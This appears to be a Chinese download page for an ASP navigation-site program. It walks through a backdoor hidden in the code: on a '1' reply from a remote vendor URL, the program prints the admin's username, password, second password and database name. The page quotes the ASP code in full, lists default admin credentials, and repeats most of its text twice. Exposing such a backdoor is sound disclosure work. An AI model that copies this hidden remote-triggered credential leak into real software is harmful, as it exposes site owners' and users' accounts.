[软件名称]夏歌导航原版程序(附破解方法)
[上传会员] X.TJ(1000)
[更新日期] 2014-04-12
[资费说明] 使用完全免费
[安全说明] 无病毒/无插件/无暗扣
[软件版本] XG-XZ20130101
[软件厂商] 4ub.cn
[界面语言] ASP/ACCESS
[浏览人气] 1638
[所属分类] 网址导航
[客户评分] ★★★★★
[标签搜索] ASP源码
软件参数
软件简介
夏歌程序破解方法(案例版本 夏歌企业版|XG-XZ20130101)
根目录下打开 banben.asp
这个文件原本只是一个用来查看版本的文件
banben=rs(0)
bb=Split(banben,“|“)
hkwap.cn caiban(1,1)
hkwap.cn “<b>网站ID:“&siteid&“<br/>“
hkwap.cn “版本号:“&bb(1)&“<br/>“
hkwap.cn “版本类型:“&bb(0)&“</b><br/>“
hkwap.cn caiban(1,2)
hkwap.cn caibans()
这里是部分源码,我们可以看到,最后一个函数有些奇怪,这个函数在其他地方都是没看到过的,就从他入手,看看他是怎么来的
通过搜索,我们找到这个函数只存在一个文件,那个文件是admin
closeconn.asp里面
Function caibans()
If fanhui=“1“ Then
response.write quziziliao()
End If
End Function
部分代码,我们可以看到,有个特定的触发条件,触发条件先不看,先来看看他的结果是什么,这里又有个函数 quziziliao()这个函数的名字翻译过来就是 取资料,看来很有可能是后门了
再来搜索一下,在根目录下wmlubb.asp这个文件里发现了这个函数
Public Function quziziliao()
quziziliao=quziliao(1,1)&“|“&quziliao(1,2)&“|“&XIAOZHI_MIMA&“|“&XIAOZHI_NAME
End Function
后面有两个变量,XIAOZHI_MIMA是登陆的二次密码,XIAOZHI_NAME是数据库名称
quziliao()这个函数的代码是
Public Function quziliao(touserid,lx)
If touserid<>““ Then
Set rs1=Server.CreateObject(“ADODB.RecordSet“)
rs1.Open “select top 1 nick,password from [user] where id=“&touserid&“ “, conn, 1,1
If Not rs1.eof Then
If lx=“1“ Then
quziliao=rs1(“nick“)
Else
quziliao=rs1(“password“)
End If
End If
rs1.Close
Set rs1=Nothing
End If
End Function
很明显,这两个函数,一个取密码,一个取账户名
好,然后我们返回,看看触发条件是什么
Function caibans()
If fanhui=“1“ Then
response.write quziziliao()
End If
End Function
fanhui=“1“就会触发,看看这个fanhui是怎么来的
在根目录下的shibie.asp看到这个变量
wz=quguolvz()&“?aa=“&request(“aa“)
fanhui=getHTTPPage(wz)
从代码上就能看出来,访问某个结合了当前访问参数的网址,这个网址返回字符1,那么就会触发后门
现在看看这个quguolvz()是什么,名字上看,翻译过来就是 取过滤字符
在根目录wmlubb.asp找到函数
Public Function quguolvz()
xcxc=Split(XZ_Ink,“|“)
quguolvz=xcxc(9)
End Function
分组并取出第九个字符
在根目录的guolv.asp看到
XZ_Ink = “select|script.|ascii|unicode|exec|insert|delete|master|truncate|http://4ub.cn/chaxun.asp|declare|drop|create|***|*|*|*|update|backup|char“
访问网址就是http://4ub.cn/chaxun.asp,再结合访问的参数,组合成http://4ub.cn/chaxun.asp?aa=XXX,就能触发后门条件,导致程序用户的密码数据库二次登陆密码都暴露了。
根目录下打开 banben.asp
这个文件原本只是一个用来查看版本的文件
banben=rs(0)
bb=Split(banben,“|“)
hkwap.cn caiban(1,1)
hkwap.cn “<b>网站ID:“&siteid&“<br/>“
hkwap.cn “版本号:“&bb(1)&“<br/>“
hkwap.cn “版本类型:“&bb(0)&“</b><br/>“
hkwap.cn caiban(1,2)
hkwap.cn caibans()
这里是部分源码,我们可以看到,最后一个函数有些奇怪,这个函数在其他地方都是没看到过的,就从他入手,看看他是怎么来的
通过搜索,我们找到这个函数只存在一个文件,那个文件是admin
closeconn.asp里面
Function caibans()
If fanhui=“1“ Then
response.write quziziliao()
End If
End Function
部分代码,我们可以看到,有个特定的触发条件,触发条件先不看,先来看看他的结果是什么,这里又有个函数 quziziliao()这个函数的名字翻译过来就是 取资料,看来很有可能是后门了
再来搜索一下,在根目录下wmlubb.asp这个文件里发现了这个函数
Public Function quziziliao()
quziziliao=quziliao(1,1)&“|“&quziliao(1,2)&“|“&XIAOZHI_MIMA&“|“&XIAOZHI_NAME
End Function
后面有两个变量,XIAOZHI_MIMA是登陆的二次密码,XIAOZHI_NAME是数据库名称
quziliao()这个函数的代码是
Public Function quziliao(touserid,lx)
If touserid<>““ Then
Set rs1=Server.CreateObject(“ADODB.RecordSet“)
rs1.Open “select top 1 nick,password from [user] where id=“&touserid&“ “, conn, 1,1
If Not rs1.eof Then
If lx=“1“ Then
quziliao=rs1(“nick“)
Else
quziliao=rs1(“password“)
End If
End If
rs1.Close
Set rs1=Nothing
End If
End Function
很明显,这两个函数,一个取密码,一个取账户名
好,然后我们返回,看看触发条件是什么
Function caibans()
If fanhui=“1“ Then
response.write quziziliao()
End If
End Function
fanhui=“1“就会触发,看看这个fanhui是怎么来的
在根目录下的shibie.asp看到这个变量
wz=quguolvz()&“?aa=“&request(“aa“)
fanhui=getHTTPPage(wz)
从代码上就能看出来,访问某个结合了当前访问参数的网址,这个网址返回字符1,那么就会触发后门
现在看看这个quguolvz()是什么,名字上看,翻译过来就是 取过滤字符
在根目录wmlubb.asp找到函数
Public Function quguolvz()
xcxc=Split(XZ_Ink,“|“)
quguolvz=xcxc(9)
End Function
分组并取出第九个字符
在根目录的guolv.asp看到
XZ_Ink = “select|script.|ascii|unicode|exec|insert|delete|master|truncate|http://4ub.cn/chaxun.asp|declare|drop|create|***|*|*|*|update|backup|char“
访问网址就是http://4ub.cn/chaxun.asp,再结合访问的参数,组合成http://4ub.cn/chaxun.asp?aa=XXX,就能触发后门条件,导致程序用户的密码数据库二次登陆密码都暴露了。
软件下载
夏歌原版程序(rar/626.7KB)
使用说明:
1.解压web压缩包,上传到网站根目录。
2.上传后,打开文件inc.asp,设置授权码,授权码联系小致获取,QQ593882628
3.首页路径:http://域名/index.asp
4.后台路径:http://域名/admin/index.asp
5.管理号初始账号:wap 初始密码:123456 初始二次密码:1
6.正版用户,永久免费升级程序。功能更强大。
7.常见问题:上传后若访问不了,请把ACCESS数据库的写入权限打开即可。或联系空间商为你打开ACCESS数据库写入权限。
8.设置404页,说明,VPS才可以设置,设置方法:IIS》指定网站》属性》自定义错页》指定404》编辑》url》填写”/404.asp“》确认即可
9.如果做自助站呢?需要泛解析与泛绑定
泛解析:
所谓“泛域名解析”是指:利用通配符 * (星号)来做次级域名以实现所有的次级域名均指向同一IP地址。
例如您的域名是abc.cn:做一个*.abc.cn的次级域名A记录指向222.222.222.222,那么生效后当访问者无论是输入“123.abc.cn”还是“123.123.abc.cn”甚至可以是“!@#.$$$$%$$$$.6543.ww.a.abc.cn”这样的 任意字符 均可以指向到222.222.222.222这个IP地址。
泛绑定:
泛绑定其实就是绑定空主机头。
如果你是独立IP空间,那直接泛解析即可,无需再进行泛绑定操作。
如果你是VPS,那请根据以下方法进行泛绑定:
IIS》网站》指定你的网站》右键》属性》网站》高级》添加:
IP地址:全部未分配
TCP端口:80
主机头值:这里留空,什么也不要填写
确认即可。
使用说明:
1.解压web压缩包,上传到网站根目录。
2.上传后,打开文件inc.asp,设置授权码,授权码联系小致获取,QQ593882628
3.首页路径:http://域名/index.asp
4.后台路径:http://域名/admin/index.asp
5.管理号初始账号:wap 初始密码:123456 初始二次密码:1
6.正版用户,永久免费升级程序。功能更强大。
7.常见问题:上传后若访问不了,请把ACCESS数据库的写入权限打开即可。或联系空间商为你打开ACCESS数据库写入权限。
8.设置404页,说明,VPS才可以设置,设置方法:IIS》指定网站》属性》自定义错页》指定404》编辑》url》填写”/404.asp“》确认即可
9.如果做自助站呢?需要泛解析与泛绑定
泛解析:
所谓“泛域名解析”是指:利用通配符 * (星号)来做次级域名以实现所有的次级域名均指向同一IP地址。
例如您的域名是abc.cn:做一个*.abc.cn的次级域名A记录指向222.222.222.222,那么生效后当访问者无论是输入“123.abc.cn”还是“123.123.abc.cn”甚至可以是“!@#.$$$$%$$$$.6543.ww.a.abc.cn”这样的 任意字符 均可以指向到222.222.222.222这个IP地址。
泛绑定:
泛绑定其实就是绑定空主机头。
如果你是独立IP空间,那直接泛解析即可,无需再进行泛绑定操作。
如果你是VPS,那请根据以下方法进行泛绑定:
IIS》网站》指定你的网站》右键》属性》网站》高级》添加:
IP地址:全部未分配
TCP端口:80
主机头值:这里留空,什么也不要填写
确认即可。
报错
67
67暂无评论!
返回网址导航
客户评分